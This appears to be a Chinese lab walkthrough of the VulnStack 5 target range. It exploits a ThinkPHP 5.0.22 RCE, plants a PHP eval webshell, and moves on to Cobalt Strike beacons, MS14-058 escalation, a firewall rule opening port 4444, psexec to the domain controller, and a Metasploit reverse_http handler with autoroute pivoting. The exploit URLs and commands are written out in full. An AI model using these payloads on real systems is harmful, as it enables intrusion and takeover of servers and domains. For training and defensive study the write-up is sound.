[PHP知识库]ATT&CK实战 VulnStack靶机五

外网打点

访问目标IP发现时ThinkPHP框架，经过报错测试发现版本号为v5.0.22,是存在漏洞的版本。百度寻找相关的漏洞去利用。

Payload

http://192.168.111.31/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

成功RCE

找能够getshell的漏洞利用点。

Payload

http://192.168.111.31/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][2]=%3C?=%20eval($_POST[%271%27]);phpinfo();%20?%3E

蚁剑连接

内网信息收集

上线CS

生成攻击exe文件上传至靶机，然后运行成功上线机器

信息收集

上线之后开始对内网信息进行收集，ipconfig /all

发现存在内网网段,使用命令systeminfo获取主机补丁信息

尝试提权MS14-058

拿到system权限，查看防火墙状态

netsh firewall show config

防火墙是开启的。不存在杀软

横向移动

收集域内信息，存在域。

域内用户 shell net user /domain

获取域控IP为192.168.138.138

扫描该主机端口

看到开了445端口，猜测存在MS17-010，但是问题是我的vps是公网环境，但是138这台主机是内网环境不出网，如何去访问该主机

尝试使用psexec去上线DC，先dump下密码

设置中转监听

第一次未成功上线，想到前面收集信息WIN7的防火墙是开着的，尝试使用命令修改防火墙放行4444端口

netsh advfirewall firewall add rule name=cs?dir=in action=allow protocol=TCP localport=4444

成功上线

拿到域控

CS派生会话上线MSF

上线msf之后对内网机器无法进行访问，于是还是采用的CS，下面就当个记录吧。

首先在MSF设置监听

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf6 exploit(multi/handler) > set lhost 10.0.12.9

lhost => 10.0.12.9

msf6 exploit(multi/handler) > set lport 9002

lport => 9002

msf6 exploit(multi/handler) > exploit

在CS上设置一个外部监听

设置完成后在CS里输入 spawn cs-msf

成功上线

run get_local_subnets 查看网段信息

run autoroute -s 192.168.138.0/24 添加中转路由

run autoroute -p 打印路由